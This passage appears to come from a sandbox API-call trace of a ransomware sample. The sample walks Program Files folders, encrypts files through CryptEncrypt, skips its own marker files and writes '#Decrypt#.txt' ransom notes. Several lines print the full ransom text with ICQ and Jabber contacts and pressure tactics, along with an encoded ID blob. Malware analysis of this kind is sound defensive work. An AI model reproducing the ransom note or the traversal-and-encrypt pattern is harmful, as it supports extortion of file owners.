xK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.993] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0251.993] CloseHandle (hObject=0x21c) returned 1 [0251.993] GetProcessHeap () returned 0x780000 [0251.993] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b628 | out: hHeap=0x780000) returned 1 [0251.993] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9060745b, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x9060745b, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x4877fc17, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x379f, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Filters.xml", cAlternateFileName="")) returned 1 [0251.993] lstrcmpiW (lpString1="Filters.xml", lpString2="Windows") returned -1 [0251.993] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Filters.xml") returned 49 [0251.994] StrStrIW (lpFirst="Filters.xml", lpSrch=".horseleader") returned 0x0 [0251.994] lstrcmpW (lpString1="Filters.xml", lpString2="#Decrypt#.txt") returned 1 [0251.994] lstrcmpW (lpString1="Filters.xml", lpString2="_uninstalling_.png") returned 1 [0251.994] lstrlenW (lpString=".testttjffg") returned 11 [0251.994] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Filters.xml", lpSrch=".testttjffg") returned 0x0 [0251.994] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0251.994] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0251.994] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Filters.xml" (normalized: "c:\\program files\\dvd maker\\shared\\filters.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.995] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93e437ad, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93e437ad, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x689cd275, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8edf, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Parity.fx", cAlternateFileName="")) returned 1 [0251.996] lstrcmpiW (lpString1="Parity.fx", lpString2="Windows") returned -1 [0251.996] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Parity.fx") returned 47 [0251.996] StrStrIW (lpFirst="Parity.fx", lpSrch=".horseleader") returned 0x0 [0251.996] lstrcmpW (lpString1="Parity.fx", lpString2="#Decrypt#.txt") returned 1 [0251.996] lstrcmpW (lpString1="Parity.fx", lpString2="_uninstalling_.png") returned 1 [0251.996] lstrlenW (lpString=".testttjffg") returned 11 [0251.996] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Parity.fx", lpSrch=".testttjffg") returned 0x0 [0251.996] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0251.996] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0251.996] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Parity.fx" (normalized: "c:\\program files\\dvd maker\\shared\\parity.fx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.997] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93e437ad, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93e437ad, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x689cd275, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8edf, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Parity.fx", cAlternateFileName="")) returned 0 [0251.997] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0251.997] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\#Decrypt#.txt") returned 51 [0251.997] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0252.000] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0252.000] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0252.001] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0252.001] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0252.001] CloseHandle (hObject=0x1cc) returned 1 [0252.001] GetProcessHeap () returned 0x780000 [0252.001] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0252.001] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c03b3f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0c03b3f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0c03b3f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x13600, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="soniccolorconverter.ax", cAlternateFileName="")) returned 1 [0252.001] lstrcmpiW (lpString1="soniccolorconverter.ax", lpString2="Windows") returned -1 [0252.002] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\soniccolorconverter.ax") returned 53 [0252.002] StrStrIW (lpFirst="soniccolorconverter.ax", lpSrch=".horseleader") returned 0x0 [0252.002] lstrcmpW (lpString1="soniccolorconverter.ax", lpString2="#Decrypt#.txt") returned 1 [0252.002] lstrcmpW (lpString1="soniccolorconverter.ax", lpString2="_uninstalling_.png") returned 1 [0252.002] lstrlenW (lpString=".testttjffg") returned 11 [0252.002] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\soniccolorconverter.ax", lpSrch=".testttjffg") returned 0x0 [0252.002] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.002] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.002] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\soniccolorconverter.ax" (normalized: "c:\\program files\\dvd maker\\soniccolorconverter.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.002] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bdd9df, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0bdd9df, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0bdd9df, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="sonicsptransform.ax", cAlternateFileName="")) returned 1 [0252.002] lstrcmpiW (lpString1="sonicsptransform.ax", lpString2="Windows") returned -1 [0252.002] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\sonicsptransform.ax") returned 50 [0252.003] StrStrIW (lpFirst="sonicsptransform.ax", lpSrch=".horseleader") returned 0x0 [0252.003] lstrcmpW (lpString1="sonicsptransform.ax", lpString2="#Decrypt#.txt") returned 1 [0252.003] lstrcmpW (lpString1="sonicsptransform.ax", lpString2="_uninstalling_.png") returned 1 [0252.003] lstrlenW (lpString=".testttjffg") returned 11 [0252.003] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\sonicsptransform.ax", lpSrch=".testttjffg") returned 0x0 [0252.003] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.003] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.003] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\sonicsptransform.ax" (normalized: "c:\\program files\\dvd maker\\sonicsptransform.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.003] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bb787f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0bb787f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0bdd9df, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4a000, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="WMM2CLIP.dll", cAlternateFileName="")) returned 1 [0252.003] lstrcmpiW (lpString1="WMM2CLIP.dll", lpString2="Windows") returned 1 [0252.003] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\WMM2CLIP.dll") returned 43 [0252.003] StrStrIW (lpFirst="WMM2CLIP.dll", lpSrch=".horseleader") returned 0x0 [0252.004] lstrcmpW (lpString1="WMM2CLIP.dll", lpString2="#Decrypt#.txt") returned 1 [0252.004] lstrcmpW (lpString1="WMM2CLIP.dll", lpString2="_uninstalling_.png") returned 1 [0252.004] lstrlenW (lpString=".testttjffg") returned 11 [0252.004] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\WMM2CLIP.dll", lpSrch=".testttjffg") returned 0x0 [0252.004] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.004] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.004] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\WMM2CLIP.dll" (normalized: "c:\\program files\\dvd maker\\wmm2clip.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.004] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bb787f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0bb787f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0bdd9df, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4a000, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="WMM2CLIP.dll", cAlternateFileName="")) returned 0 [0252.004] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0252.005] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\#Decrypt#.txt") returned 44 [0252.005] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0252.006] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0252.006] WriteFile (in: hFile=0x164, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0252.007] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0252.007] WriteFile (in: hFile=0x164, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0252.007] CloseHandle (hObject=0x164) returned 1 [0252.007] GetProcessHeap () returned 0x780000 [0252.007] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0252.008] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe2fb0dc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe2fb0dc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0252.008] lstrcmpiW (lpString1="Internet Explorer", lpString2="Windows") returned -1 [0252.008] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer") returned 38 [0252.008] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0252.008] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0252.008] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Internet Explorer", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.008] GetProcessHeap () returned 0x780000 [0252.008] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0252.008] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\*") returned 40 [0252.008] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe2fb0dc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe2fb0dc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0252.008] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.008] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\.") returned 40 [0252.009] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.009] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe2fb0dc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe2fb0dc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0252.009] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.009] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\..") returned 41 [0252.009] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.009] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.009] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30f0ae80, ftCreationTime.dwHighDateTime=0x1d58b4d, ftLastAccessTime.dwLowDateTime=0x2b7795b0, ftLastAccessTime.dwHighDateTime=0x1d5b46d, ftLastWriteTime.dwLowDateTime=0x2b7795b0, ftLastWriteTime.dwHighDateTime=0x1d5b46d, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="alpha cornwall peripheral.exe", cAlternateFileName="ALPHAC~1.EXE")) returned 1 [0252.009] lstrcmpiW (lpString1="alpha cornwall peripheral.exe", lpString2="Windows") returned -1 [0252.009] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\alpha cornwall peripheral.exe") returned 68 [0252.009] StrStrIW (lpFirst="alpha cornwall peripheral.exe", lpSrch=".horseleader") returned 0x0 [0252.009] lstrcmpW (lpString1="alpha cornwall peripheral.exe", lpString2="#Decrypt#.txt") returned 1 [0252.009] lstrcmpW (lpString1="alpha cornwall peripheral.exe", lpString2="_uninstalling_.png") returned 1 [0252.009] lstrlenW (lpString=".testttjffg") returned 11 [0252.009] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\alpha cornwall peripheral.exe", lpSrch=".testttjffg") returned 0x0 [0252.009] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.009] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.009] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\alpha cornwall peripheral.exe" (normalized: "c:\\program files\\internet explorer\\alpha cornwall peripheral.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.010] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, 